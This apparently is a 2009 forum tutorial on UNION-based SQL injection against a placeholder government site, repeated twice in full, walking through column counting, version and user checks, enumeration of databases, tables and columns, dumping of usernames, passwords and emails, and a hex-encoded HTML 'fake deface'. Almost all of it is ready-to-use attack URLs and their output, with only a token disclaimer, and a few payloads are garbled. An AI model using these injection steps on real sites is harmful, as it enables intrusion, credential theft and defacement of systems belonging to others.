[Tutorial] Advance SQL Injection
Posted: Sun Dec 13, 2009 11:46 am
This paper is the advance of my first article. In this tutorial, we will try how to enter to the website deeper than normaly using SQL Injection.
1. The target is http://www.victim.gov/agent_detail.php?aid=9
We check the the site, is this site have bug. We only need to add single quote in last url. So the url be:
http://www.victim.gov/agent_detail.php?aid=9'
And error is appear.
2. We check number of column of that site.
To check number of column, we user "order by". Dont forget to add (-) after = and (--) at last URl
UR:
http://www.victim.gov/agent_detail.php?aid=-9 order by 1-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 2-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 3-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 4-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 5-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 6-- //error appear
because in "order by 6" error was apper so number of column is 5. The formula is n-1, which n is number of order by when error appear.
3. We check the number that can be exploitable.
We use "union all select"
UR:
http://www.victim.gov/agent_detail.php?aid=-9 union all select number_of_column!--
so:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,3,4,5--
The 1,2,3,4,5 is from number_colum, if the number_of_column is 3, so the query will be "union all select 1,2,3".
Number 3 appear. So 3 is exploitable number.
4. We check the version of that site.
We use "version()" . We only need to replace the exploitable number with version().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,version(),4,5--
and appear:
5.0.45-community-nt . We are luckly. We will able to know the name of database, table, and column.
5. We check the user of that site.
We use "user()" . We only need to replace the exploitable number with user().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,user(),4,5--
and appear:
root@localhost.
so the username is root.
6. We check the default database.
We use "database()" . We only need to replace the exploitable number with database()().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,database(),4,5--
and appear: "news"
so the default database of that site is "news".
7. We check all of database in that site.
We use "concat(schema_name) from information_schema.schemata"
We need to replace exploitable with "concat(schema_name)" and we must add "from information_schema.schemata" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(schema_name),4,5 from information_schema.schemata--
You will see all of database in that site. Example:
news
information_schema
mysql
cms
connection
shop
etc
8. We check the name of table of that site (default database).
This is query if you want see the table name of default database.
We use "concat(table_name) from information_schema.tables where table_schema=database()"
We need to replace exploitable with "concat(table_name)" and we must add "from information_schema.tables where table_schema=database()" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--
You will see table name of that database. Example:
admin
config
news
etc
9. We check the name of the table (default database).
We use "concat(column_name) from information_schema.columns where table_name=0x[hexa]"
[hexa] is the result of convertation is we convert text to hex. Example the hex of "cms" is 636D73 and hex of "admin" is 61646D696E .
Example the table is "admin", so the URL will be:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
And you see the name of column in that table. Example:
username
password
email
etc
10. Dump the data (default database).
We use "concat(column_name_1,0x3a,column_name_2,0x3a,column_name_n) from table_name"
3a is the result if we convert ":" to hex, it will separate each dumped data. Example we want to dump data in table admin, column username,password,email .
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(username,0x3a,password,0x3a,email),4,5 from admin--
And you see:
admin:becareful:[email protected]
the strusture:
admin --> username
: --> 0x3a
becareful --> password
: --> 0x3a
[email protected] --> email
We have learn how to dump from default database. So how about other database?
11. Check table_name of other database.
Example the other database is "cms"
We use "concat(table_name) from information_schema.tables where table_schema=0x[hex]" [hex] is the result when the convert name f the database to hex. The resulf if we convert "cms" to hex is 636D73.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=0x636D73--
And you see:
cms
cms_order
cms_user
12. Check column_name of following tables
Example the table is "cms_order"
We use "concat(column_name) from information_schema.columns where table_schema=0x[hex] and table_name=0x[hex]"
hex of "cms_order" is 636D735F6F72646572. So URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_schema=0x636D73 and table_name=0x636D735F6F72646572--
You will see:
order_id
order_reff
13. Dump data from following column.
Example the column_nane are order_id,order_reff
We use "concat(column_name,0x3a_column_name2) from database.table"
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(order_id,0x3aorder_reff),4,5 from cms.cms_order--
You will se the data
14. Fake deface using SQL injection
We only need convert html to hex.
example: <marquee>xyberbreaker</marquee> hex: 0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E
After that, replace exploitable number with it.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5--
You will see something good
The end.
/////////////////////////////////////////////////////////////////////////////////////////
THIS IS FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE OF ANYTHING READER DO.
"bagi yang menggunakan untuk kejahatan, dosa ditanggung sendiri".
http://xyber-breaker.blogspot.com
1. The target is http://www.victim.gov/agent_detail.php?aid=9
We check the the site, is this site have bug. We only need to add single quote in last url. So the url be:
http://www.victim.gov/agent_detail.php?aid=9'
And error is appear.
2. We check number of column of that site.
To check number of column, we user "order by". Dont forget to add (-) after = and (--) at last URl
UR:
http://www.victim.gov/agent_detail.php?aid=-9 order by 1-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 2-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 3-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 4-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 5-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 6-- //error appear
because in "order by 6" error was apper so number of column is 5. The formula is n-1, which n is number of order by when error appear.
3. We check the number that can be exploitable.
We use "union all select"
UR:
http://www.victim.gov/agent_detail.php?aid=-9 union all select number_of_column!--
so:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,3,4,5--
The 1,2,3,4,5 is from number_colum, if the number_of_column is 3, so the query will be "union all select 1,2,3".
Number 3 appear. So 3 is exploitable number.
4. We check the version of that site.
We use "version()" . We only need to replace the exploitable number with version().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,version(),4,5--
and appear:
5.0.45-community-nt . We are luckly. We will able to know the name of database, table, and column.
5. We check the user of that site.
We use "user()" . We only need to replace the exploitable number with user().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,user(),4,5--
and appear:
root@localhost.
so the username is root.
6. We check the default database.
We use "database()" . We only need to replace the exploitable number with database()().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,database(),4,5--
and appear: "news"
so the default database of that site is "news".
7. We check all of database in that site.
We use "concat(schema_name) from information_schema.schemata"
We need to replace exploitable with "concat(schema_name)" and we must add "from information_schema.schemata" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(schema_name),4,5 from information_schema.schemata--
You will see all of database in that site. Example:
news
information_schema
mysql
cms
connection
shop
etc
8. We check the name of table of that site (default database).
This is query if you want see the table name of default database.
We use "concat(table_name) from information_schema.tables where table_schema=database()"
We need to replace exploitable with "concat(table_name)" and we must add "from information_schema.tables where table_schema=database()" in the last url.
So the URl:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--
You will see table name of that database. Example:
admin
config
news
etc
9. We check the name of the table (default database).
We use "concat(column_name) from information_schema.columns where table_name=0x[hexa]"
[hexa] is the result of convertation is we convert text to hex. Example the hex of "cms" is 636D73 and hex of "admin" is 61646D696E .
Example the table is "admin", so the URL will be:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
And you see the name of column in that table. Example:
username
password
etc
10. Dump the data (default database).
We use "concat(column_name_1,0x3a,column_name_2,0x3a,column_name_n) from table_name"
3a is the result if we convert ":" to hex, it will separate each dumped data. Example we want to dump data in table admin, column username,password,email .
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(username,0x3a,password,0x3a,email),4,5 from admin--
And you see:
admin:becareful:[email protected]
the strusture:
admin --> username
: --> 0x3a
becareful --> password
: --> 0x3a
[email protected] --> email
We have learn how to dump from default database. So how about other database?
11. Check table_name of other database.
Example the other database is "cms"
We use "concat(table_name) from information_schema.tables where table_schema=0x[hex]" [hex] is the result when the convert name f the database to hex. The resulf if we convert "cms" to hex is 636D73.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=0x636D73--
And you see:
cms
cms_order
cms_user
12. Check column_name of following tables
Example the table is "cms_order"
We use "concat(column_name) from information_schema.columns where table_schema=0x[hex] and table_name=0x[hex]"
hex of "cms_order" is 636D735F6F72646572. So URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_schema=0x636D73 and table_name=0x636D735F6F72646572--
You will see:
order_id
order_reff
13. Dump data from following column.
Example the column_nane are order_id,order_reff
We use "concat(column_name,0x3a_column_name2) from database.table"
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(order_id,0x3aorder_reff),4,5 from cms.cms_order--
You will se the data
14. Fake deface using SQL injection
We only need convert html to hex.
example: <marquee>xyberbreaker</marquee> hex: 0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E
After that, replace exploitable number with it.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5--
You will see something good
The end.
/////////////////////////////////////////////////////////////////////////////////////////
THIS IS FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE OF ANYTHING READER DO.
"bagi yang menggunakan untuk kejahatan, dosa ditanggung sendiri".
http://xyber-breaker.blogspot.com